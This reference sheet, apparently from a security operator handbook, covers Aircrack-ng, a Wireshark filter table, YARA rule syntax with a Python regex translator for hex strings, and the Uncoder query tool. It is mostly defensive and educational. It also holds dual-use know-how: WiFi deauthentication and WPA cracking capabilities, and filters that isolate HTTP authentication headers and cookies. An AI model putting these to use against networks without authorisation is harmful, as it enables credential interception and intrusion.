AIRCRACK-NG
[Link]
Aircrack-ng is a complete suite of tools to assess WiFi network
security. It focuses on different areas of WiFi security:
Monitoring: Packet capture and export of data to text files for
further processing by third party tools
Attacking: Replay attacks, deauthentication, fake access points and
others via packet injection
Testing: Checking WiFi cards and driver capabilities (capture and
injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)

WIFI-ARSENAL - GitHub Everything Wireless

[Link]

NEW TO SDR (Software Defined Radio)


[Link]

WIRESHARK
RED/BLUE TEAM NETWORK TRAFFIC WINDOWS/LINUX/MacOS
Wireshark is an open-source network protocol analysis software program. The list below mixes capture filters (BPF syntax such as host, net, port, ether host, ip proto) with display filters (such as frame contains, http.user_agent, tcp.time_delta); the two syntaxes are not interchangeable, so use each only in its own filter field.

FILTER                                          DESCRIPTION
!(arp or icmp or stp)                           Filters out arp, icmp, stp protocols to reduce background noise
dst host ff02::1                                Captures all IPv6 traffic within the local network that is multicast
[Link]                                          Filter MAC Address
[Link]                                          Filter MAC Address
eth[0x47:2] == 01:80                            Offset filter for HEX values of 0x01 and 0x80 at offset location 0x47
ether host ##:##:##:##:##:##                    Captures only traffic to or from the MAC address used. Capitalizing hexadecimal letters does not matter. Example: ether host [Link]
frame contains traffic                          Displays all packets that contain the word 'traffic'
host #.#.#.#                                    Capture only traffic to or from a specific IP address. Example: host [Link]
host [Link] and not (port xx or port yy)        Capture all traffic, excluding specific packets
[Link]                                          Filter to HTTP Basic Authentication
[Link]                                          Filter to HTTP Cookies
[Link]                                          Filter to HTTP data packets
[Link]                                          Filter to HTTP Referer headers
[Link]                                          Sets a filter for all HTTP GET and POST requests
[Link]                                          Filter to HTTP Server
http.user_agent                                 Filter to HTTP User Agent strings
http.www_authentication                         Filter to HTTP authentication
ip                                              Captures only IPv4 traffic
ip proto 41                                     Capture only IPv6-over-IPv4 tunnelled traffic
[Link] == [Link]/24                             Shows packets to and from any address in the [Link]/24 space
[Link] == [Link]                                Sets a filter for any packet with [Link] as either the src or dest
[Link]==[Link] && [Link]==[Link]                Sets a conversation filter between the two defined IP addresses
[Link]                                          Filter IP to destination
[Link]                                          Filter IP to source
ip6                                             Captures only IPv6 traffic
ip6 and not ip proto 41                         Capture native IPv6 traffic only; this excludes tunnelled IPv6
net #.#.#.#/24                                  Capture traffic to or from (sources or destinations) a range of IP addresses
not broadcast and not multicast                 Capture only unicast traffic
port ##                                         Captures only a particular src or dst port
port sip                                        Captures all SIP traffic (VoIP)
pppoes                                          Capture PPPoE traffic
tcp                                             Captures only TCP traffic
tcp contains xxx                                Searches TCP packets for that string
tcp portrange 1800-1880                         Capture traffic within a range of ports
[Link] && ![Link].window_update                 Displays all retransmissions, duplicate acks, zero windows, and more in the trace
[Link]                                          Filter Port to TCP destination
[Link] == 0x012                                 Displays all TCP SYN/ACK packets and shows the connections that had a positive response. Related to this is [Link]==1
[Link]==4000                                    Sets a filter for any TCP packet with 4000 as src or dest
[Link]                                          Filter port to TCP source
tcp.time_delta > .250                           Sets a filter to display all TCP packets that have a delta time greater than 250ms
[Link]                                          Filter Port to UDP destination
[Link]                                          Filter Port to UDP source
vlan                                            Captures only VLAN traffic
[Link] eq 0                                     Filter to 802.11 Management Frames
[Link] eq 1                                     Filter to 802.11 Control Frames
[Link].type_subtype eq 0 (1=response)           Filter to 802.11 Association Requests
[Link].type_subtype eq 11 (12=authenticate)     Filter to 802.11 Authentication Requests
[Link].type_subtype eq 2 (3=response)           Filter to 802.11 Reassociation Requests
[Link].type_subtype eq 4 (5=response)           Filter to 802.11 Probe Requests
[Link].type_subtype eq 8                        Filter to 802.11 Beacons

REFERENCE:
[Link]
[Link]
[Link]
[Link]
wireshark-filters-2

YARA
ALL DISCOVERY N/A
YARA is an open source tool aimed at helping researchers identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns. Each description consists of a set of strings and a Boolean expression that determines its logic.

META
The metadata section carries additional information about your rule as user-defined key/value pairs.

STRINGS
Three types of strings in YARA:
1- hexadecimal
   -wild-cards        Ex. { E2 34 ?? C8 A? FB }
   -jumps             Ex. { F4 23 [4-6] 62 B4 }
   -alternatives      Ex. { F4 23 ( 62 B4 | 56 ) 45 }
2- text
   -case-sensitive    Ex. "text"
   -case-insensitive  Ex. "text" nocase
   -wide-character    Ex. "text" wide
   -full words        Ex. "text" fullword
3- regular expressions
   \       Quote the next metacharacter
   ^       Match the beginning of the file
   $       Match the end of the file
   |       Alternation
   ()      Grouping
   []      Bracketed character class

Quantifiers:
   *       Match 0 or more times
   +       Match 1 or more times
   ?       Match 0 or 1 times
   {n}     Match exactly n times
   {n,}    Match at least n times
   {,m}    Match 0 to m times
   {n,m}   Match n to m times
   *?      Match 0 or more times, non-greedy
   +?      Match 1 or more times, non-greedy
   ??      Match 0 or 1 times, non-greedy
   {n}?    Match exactly n times, non-greedy
   {n,}?   Match at least n times, non-greedy
   {,m}?   Match 0 to m times, non-greedy
   {n,m}?  Match n to m times, non-greedy
Escape sequences:
   \t      Tab (HT, TAB)
   \n      New line (LF, NL)
   \r      Return (CR)
   \f      Form feed (FF)
   \a      Alarm bell
   \xNN    Character whose ordinal number is the given hexadecimal number
Character classes:
   \w      Match a word character (alphanumeric plus "_")
   \W      Match a non-word character
   \s      Match a whitespace character
   \S      Match a non-whitespace character
   \d      Match a decimal digit character
   \D      Match a non-digit character
Zero-width assertions:
   \b      Match a word boundary
   \B      Match except at a word boundary

CONDITION
Conditions are Boolean expressions that must be met; they can use:
+ boolean operators (and, or, not)
+ relational operators (>=, <=, <, >, ==, !=)
+ arithmetic operators (+, -, *, \, %)
+ bitwise operators (&, |, <<, >>, ~, ^)

Example YARA Rule:

rule ExampleRule
{
    meta:
        author = "netmux"
        description = "Detects Emotet binary"
        license = "Free as in beer"
    strings:
        $ex_text_string = "text string" nocase
        $ex_hex_string = { E2 34 A1 C8 23 FB }

    condition:
        $ex_text_string or $ex_hex_string
}
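Added example, not from the YARA project or the Operator Handbook: a small translator that turns the three hex-string forms above (wild-cards, jumps, alternatives) and a `nocase`/`wide` text string into Python bytes regexes, then evaluates ExampleRule's condition against constructed sample bytes, so the matching semantics of each syntax element can be checked offline without a YARA install.

```python
import re

# Tokens of a YARA hex string: jumps like [4-6], grouping/alternation, and two-character byte tokens
HEX_TOKEN = re.compile(r"\[[0-9]*-?[0-9]*\]|\(|\)|\||[0-9A-Fa-f?]{2}")
ANY_BYTE = rb"[\x00-\xff]"


def _nibble_wildcard(tok: str) -> bytes:
    """'A?' or '?B': a character class of the 16 byte values whose fixed nibble matches."""
    hi, lo = tok.lower()
    matching = [v for v in range(256)
                if (hi == "?" or v >> 4 == int(hi, 16)) and (lo == "?" or v & 0xF == int(lo, 16))]
    return b"[" + b"".join(b"\\x%02x" % v for v in matching) + b"]"


def hex_string_to_regex(pattern: str) -> bytes:
    """Translate a YARA hex string such as '{ F4 23 [4-6] ( 62 B4 | 56 ) 45 }' to a bytes regex."""
    body = pattern.strip()
    if not (body.startswith("{") and body.endswith("}")):
        raise ValueError("hex string must be written as { ... }")
    out = []
    for tok in HEX_TOKEN.findall(body[1:-1]):
        if tok == "??":                                  # wild-card: any single byte
            out.append(ANY_BYTE)
        elif tok.startswith("["):                        # jump: [n], [n-m] or [n-] (open ended)
            lo, dash, hi = tok[1:-1].partition("-")
            out.append(ANY_BYTE + (b"{%d}" % int(lo) if not dash
                                   else b"{%d,%s}" % (int(lo or 0), hi.encode())))
        elif tok in ("(", ")", "|"):                     # alternatives map straight onto regex syntax
            out.append(tok.encode())
        elif "?" in tok:                                 # nibble wild-card
            out.append(_nibble_wildcard(tok))
        else:                                            # plain byte
            out.append(b"\\x%02x" % int(tok, 16))
    return b"".join(out)


def text_string_to_regex(text: str, nocase: bool = False, wide: bool = False) -> bytes:
    """YARA text string with the 'nocase' / 'wide' modifiers listed above."""
    raw = text.encode("utf-16-le") if wide else text.encode()   # wide = UTF-16LE (zero byte after each char)
    body = re.escape(raw)
    return b"(?i)" + body if nocase else body


def find_matches(pattern: str, data: bytes):
    """(offset, matched bytes) of every non-overlapping match, the data YARA's @ and ! operators expose."""
    return [(m.start(), m.group(0)) for m in re.finditer(hex_string_to_regex(pattern), data)]


def example_rule_matches(data: bytes) -> bool:
    """Condition of ExampleRule above: $ex_text_string or $ex_hex_string."""
    text_hit = re.search(text_string_to_regex("text string", nocase=True), data)
    hex_hit = re.search(hex_string_to_regex("{ E2 34 A1 C8 23 FB }"), data)
    return bool(text_hit or hex_hit)


# Constructed sample bytes laid out so each of the three hex-string forms above has a known match
SAMPLE = bytes.fromhex(
    "00 11 E2 34 7A C8 A3 FB 22 "        # { E2 34 ?? C8 A? FB } at offset 2
    "F4 23 01 02 03 04 05 62 B4 99 "     # { F4 23 [4-6] 62 B4 } at offset 9 (5-byte jump) and again at 19
    "F4 23 56 45 F4 23 62 B4 45 00"      # { F4 23 ( 62 B4 | 56 ) 45 } at offsets 19 and 23
)

if __name__ == "__main__":
    for pat in ("{ E2 34 ?? C8 A? FB }", "{ F4 23 [4-6] 62 B4 }", "{ F4 23 ( 62 B4 | 56 ) 45 }"):
        print(pat, "->", [(off, m.hex()) for off, m in find_matches(pat, SAMPLE)])
    print("ExampleRule on SAMPLE:", example_rule_matches(SAMPLE))
    print("ExampleRule on 'some TEXT STRING':", example_rule_matches(b"some TEXT STRING"))
```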

YARA SIGNATURE CREATION MINDMAP:

@cyb3rops [Link]

Uncoder: One common language for cyber security
[Link]
[Link] is an online translator for SIEM saved searches, filters, queries, API requests, correlation rules and Sigma rules, built to help SOC analysts, threat hunters and SIEM engineers. Through an easy, fast and private UI you can translate queries from one tool to another in a matter of seconds, without needing access to the SIEM environment.
[Link] supports rules based on Sigma, ArcSight, Azure Sentinel, Elasticsearch, Graylog, Kibana, LogPoint, QRadar, Qualys, RSA NetWitness, Regex Grep, Splunk, Sumo Logic, Windows Defender ATP, Windows PowerShell, X-Pack Watcher.

REFERENCE:
[Link]
[Link]
